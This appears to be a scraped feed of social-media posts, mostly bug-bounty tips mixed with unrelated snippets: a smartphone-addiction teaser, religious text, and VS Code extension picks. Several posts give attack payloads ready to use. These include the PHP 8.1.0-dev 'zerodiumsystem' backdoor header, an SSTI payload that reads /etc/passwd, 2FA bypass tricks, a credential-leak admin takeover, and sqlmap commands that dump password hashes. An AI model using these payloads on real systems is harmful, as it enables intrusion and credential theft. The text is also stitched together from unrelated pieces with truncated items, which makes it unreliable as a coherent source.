100 web vulnerabilities, categorized into various types:

Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath

Stop wasting time on your phone.

Here's how you can put an end to your smartphone addiction...

When you learn from someone,who provides you with information and you would like to meet them, this occurred in #Blackhatmea
Thanks Rana Khalil 🇵🇸 🙏

تم اضافة السودان لقائمة الدول التى يمكن الدخول منها الى Chat GPT

ومَا مِن دَابَّةٍ فِي الْأَرْضِ ولا طائر يطير بجناحيه إلا أمم أمْثَالَكُم ✨

If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbounty #bugbounty tips #rce #sqli

Admin panel pwn~ Ahsan Khan

1. Found credentials on dehashed.com
2. Applied on admin.site.com = Protected with OTP
3. Bypassed using API
4. admin.site.com/api/login?user…

Great talk by Orange Tsai 🍊 at #RomHack2023 ! Learned a lot and feeling inspired! 👏 #CyberSecurity #InfoSec

eMaPT✅
Thanks @eLearnSecurity
verified.elearnsecurity.com/certificates/b…

#SSTI to #RCE :

curl -X POST test.com:8080 -H 'Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k' --data 'name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}'

#bugbountytips

Below is the best extensions I used in VScode :

1- Prettier - Code formater
2- Auto Rename Tag
3- Atom One Dark Them
4- MySQL ( authored by : cweijan)
5-SQLite

الإرهاق الوظيفي و #الامن_السيبراني
تغريدة تلخص لك أبرز التحديات في المجال
العمل في المجال التقني، وبالأخص #الأمن_السيبراني ، وذلك بسبب التحديات والتطلعات والآمال الكبيرة الموضوعة على عاتق المختصين مما يسبب لهم الإرهاق.
#يتبع

Google Authenticator #Bypass
Steps:
1. Set-up Google Authenticator for 2FA
2. Now, 2FA is enable
3. Games on password reset page and change your password
4. If you are website redirect you to your dashboard, then 2FA (google Authenticator) is bypassed

#bugbountytips
#bypass

Bypass #2FA with #null or 00000
Enter the code 00000 or null to bypass 2FA protection

#2FA
#bypass
#BugBounty
#bugbountytip

I've made over 100k on SSRF vulnerabilities.

They aren't always as simple as pointing it at localhost or AWS Metadata service.

Here are some tricks I've picked up over the past 5 years of web app testing:

Using a #proxy with #SQLmap

sqlmap -u 'target.com' --proxy='http:// 127.0.0.1 :8080'

#bugbountytips #BugBounty #burp

Custom injection in #UserAgent / #Header / #Referer / #Cookie

python sqlmap.py -u 'example.com' --data 'username=admin&password=pass' --headers='x-forwarded-for:127.0.0.1*' The injection is located at the '*'

#bugbountytips #BugBounty

Load a request file and use mobile #user -agent
sqlmap -r sqli.req --safe-url=http://0x2nac0nda .com/ --mobile --safe-freq=1

#bugbountytips #BugBounty

Basic arguments for #SQL map
sqlmap --url='<url>' -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

#bugbountytips #BugBounty #SQL #sqlmap